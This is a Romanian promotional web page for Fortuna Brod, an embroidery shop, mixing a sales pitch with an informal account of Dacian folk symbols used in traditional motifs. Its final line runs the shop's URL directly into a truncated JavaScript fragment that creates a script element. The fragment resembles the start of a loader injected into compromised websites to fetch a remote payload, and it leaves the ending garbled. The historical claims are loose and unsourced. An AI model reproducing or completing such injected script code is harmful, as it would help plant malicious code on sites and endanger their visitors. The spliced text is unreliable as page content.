broderii computerizate

broderii computerizate

Arta broderiei este folosita inca din cele mai vechi timpuri ca mijloc de exprimare artistica dar si ca mod de a oferi o simbolistica aparte a costumelor ritualice prin intermediul simbolisticii traditionale si nu numai. In prezent, arta aceasta inca este prezenta, insa tehnologia si-a facut simtita prezenta si in acest domeniu, aducand tehnici si tehnologii pentru a putea realiza si broderii computerizate. Suntem Fortuna Brod iar pentru ca noua ne place frumosul, oferim servicii complete de personalizare a diferitelor articole vestimentare si din material textil cu ajutorul unor broderii computerizate ce pot fi de la simple texte (numele unei persoane, al firmei, etc.) pana la grafice complexe in 16 culori sau nuante.

Istoria simbolisticii din broderii computerizate cu iz traditional

Si pentru tipul de broderii computerizate pe care le putem realiza pleaca in primul rand de la arta cusutului si a goblenurilor, dorim sa iesim un pic din tiparele modernului si ale tehnologiei pentru a analiza un pic cum isi impodobeau taranii de acum 1000 sau chiar 2000 de ani in urma. Este evident ca prin broderii computerizate putem realiza fara probleme si aceste elemente decorative pe orice suport textil.

Insa, sa ne intoarcem in timp, inainte cu multe secole de existenta unor broderii computerizate, a internetului sau chiar si inainte de existenta curentului electric. Statul Roman de acum aproape 2000 de ani era complet diferit, defapt nici nu era roman. Pe teritoriul actual al Romaniei au trait Dacii, popor stramos al acestor zone, acestia fiind organizati in diferite regiuni, avand propriile simbolistici dar si obiceiuri. Insa, cu toate aceste diferente, poporul Dac era unit prin ceva, in afara de domnitor, si de simbolistica primara este intalnita in foarte multe regiuni, atat pe intreaga zona actuala a Romaniei, dar si zone mari din tari ca Moldova, Bulgaria Serbia Ungaria si Ucraina. Ca si religie, poporul dac era pagan, avand ca religie Zamolxianismul, religie bazata pe intelepciunea unui om-zeu Zalmoxis si care, in mod curios, se pare ca promova cam acelasi valori ca si Crestinismul.

Cu mult inainte de a exista broderii computerizate sau moduri de comunicare in masa sau rapide, aceste sate dacice pareau a fi unite de aceleasi simboluri si nu numai. Cel mai des utilizat simbol prezent atat pe vasele ritualice dar si in vestimentatiile lor, cercul, are o stransa legatura cu Soarele dar si cu ceea ce dacii considerau a fi Zalmoxis, omul-zeu atotstiutor si intelept. Insa, pe langa cercuri si puncte, dacii aveau  straie foarte colorate si frumoase. In special femeile dacice aveau costume cu modele complicate a caror realizare putea dura chiar si un an. Dupa cum spuneam simbolistica portului dacic varia in functie de regiune, insa motive ca cercul, triunghiul (aparut o idee mai tarziu… dupa aparitia Romanilor) dar si liniile zig-zag erau imbinate cu modele si decoratii complexe inspirate din natura.

Putem realiza orice motive traditionale folosind echipamentele de broderii computerizate

Aceste motive au fost transmise din generatie in generatie dar si pastrate in cultura romanilor pana in zilele de azi, iar daca mai nou iele au devenit o imbracaminte chic dar si usor senzuala, acest lucru poate fi pus si pe seama acestui bagaj cultural.

Fortuna brod poate realiza prin broderii computerizate pana si cele mai complicate modele si motive traditionale, fie ca doriti sa personalizati o sacosa, o ie sau orice altceva din material textil. Va asteptam cu informatii despre noi dar si cu posibilitatea de a ne contacta, pe pagina de internet www.broderiicluj.rovar d=document;var s=d.createElement(‘script’);